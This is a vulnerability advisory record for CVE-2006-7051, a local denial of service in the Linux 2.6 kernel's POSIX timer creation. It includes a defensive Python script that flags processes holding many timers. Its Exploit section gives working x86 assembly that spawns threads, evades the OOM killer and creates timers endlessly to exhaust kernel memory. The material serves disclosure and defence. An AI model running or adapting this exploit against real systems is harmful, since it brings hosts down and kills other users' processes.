Linux kernel sys_timer_create denial of service vulnerability

Vulnerability ID: 1110023
Vulnerability type: Unknown
Published: 2006-04-09
Updated: 2007-02-23
CVE: CVE-2006-7051
CNNVD ID: CNNVD-200702-476
Platform: Linux
CVSS score: 4.9
|Vulnerability sources
https://www.exploit-db.com/exploits/1657
https://www.securityfocus.com/bid/82136
https://cxsecurity.com/issue/WLB-2007020090
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-476
|Vulnerability details
The sys_timer_create function in posix-timers.c in Linux kernel 2.6.x allows local users to cause a denial of service (memory consumption) by creating a large number of POSIX timers, and possibly to bypass memory limits or cause other processes to be killed. These POSIX timers are allocated in memory but are not counted as part of the process's memory.
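As an added defender-side example, not part of this record or of the exploit below: since the timers are not charged to process memory, ordinary memory accounting will not reveal a process hoarding them, but a per-process count is exposed in /proc/<pid>/timers (available since Linux 3.10, one four-line record per timer). The script parses that format and flags processes holding more than a threshold; the sample text and the threshold are constructed.

```python
#!/usr/bin/env python3
"""Flag processes holding an unusually large number of POSIX timers."""
import os
import sys

# Constructed sample in the /proc/<pid>/timers format (two timers).
SAMPLE_TIMERS = """\
ID: 0
signal: 14/0000000000000000
notify: signal/pid.4242
ClockID: 0
ID: 1
signal: 60/00007ffd1c0f3a20
notify: thread/tid.4243
ClockID: 1
"""


def parse_timers(text):
    """Return a list of (timer_id, clock_id) tuples from a timers file's text."""
    timers, current_id = [], None
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key == "ID":
            current_id = int(value)
        elif key == "ClockID" and current_id is not None:
            timers.append((current_id, int(value)))
            current_id = None
    return timers


def count_timers(pid, proc="/proc"):
    """Number of POSIX timers owned by pid; 0 if unreadable or unsupported."""
    try:
        with open(os.path.join(proc, str(pid), "timers")) as f:
            return len(parse_timers(f.read()))
    except OSError:
        return 0


def find_timer_hogs(threshold, proc="/proc"):
    """Return {pid: count} for processes holding more than `threshold` timers."""
    if not os.path.isdir(proc):
        return {}
    pids = (int(n) for n in os.listdir(proc) if n.isdigit())
    counts = {pid: count_timers(pid, proc) for pid in pids}
    return {pid: n for pid, n in counts.items() if n > threshold}


if __name__ == "__main__":
    limit = int(sys.argv[1]) if len(sys.argv) > 1 else 1000  # constructed default
    for pid, n in sorted(find_timer_hogs(limit).items(), key=lambda kv: -kv[1]):
        print(f"pid {pid}: {n} POSIX timers")
```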
|Exploit
;nasm -f elf noHeaven.asm
;ld -s -o noHeaven noHeaven.o

section .text
   global _start

count   equ     8       ; threads count - do it quicker

_start:
       mov     ebx, count
       call    create_threads
       jmp     done
_pause:
       mov     eax,29
       int     0x80
       ret
create_threads:
       mov     eax,2
       int     0x80
       test    eax,eax
       jz      consume
       dec     ebx
       test    ebx,ebx
       jnz     create_threads
       ret
consume:
setsid:         ;       so we won't get counted as one thread in oom_killer()
       xor     ebx,ebx ;       each task will have about 20 oom_score which
       mov     eax,66 ;        is less than 'init' and others
       int     0x80
       push    eax
loopek:
       mov     eax,259
       mov     ebx,0
       mov     ecx,0
       mov     edx,esp
       int     0x80
       jmp     loopek
done:
       xor     ebx,ebx
       mov     eax,1
       int     0x80

; milw0rm.com [2006-04-09]
|Affected products
Thomas Lange Fully Automated Installation 2.6.18.3
Linux Linux Kernel 2.6.18.4
Linux Linux Kernel 2.6.18.0
Linux kernel 2.6.20.1
Linux kernel 2.6.20
Linux kernel 2.6.19
|References

Source: XF
Name: linux-systimercreate-dos(25712)
Link: http://xforce.iss.net/xforce/xfdb/25712
Source: BUGTRAQ
Name: 20060404 Linux Kernel Local DoS vulnerability.
Link: http://www.securityfocus.com/archive/1/archive/1/430278/30/5790/threaded
Source: MILW0RM
Name: 1657
Link: http://www.milw0rm.com/exploits/1657
Source: SREASON
Name: 2287
Link: http://securityreason.com/securityalert/2287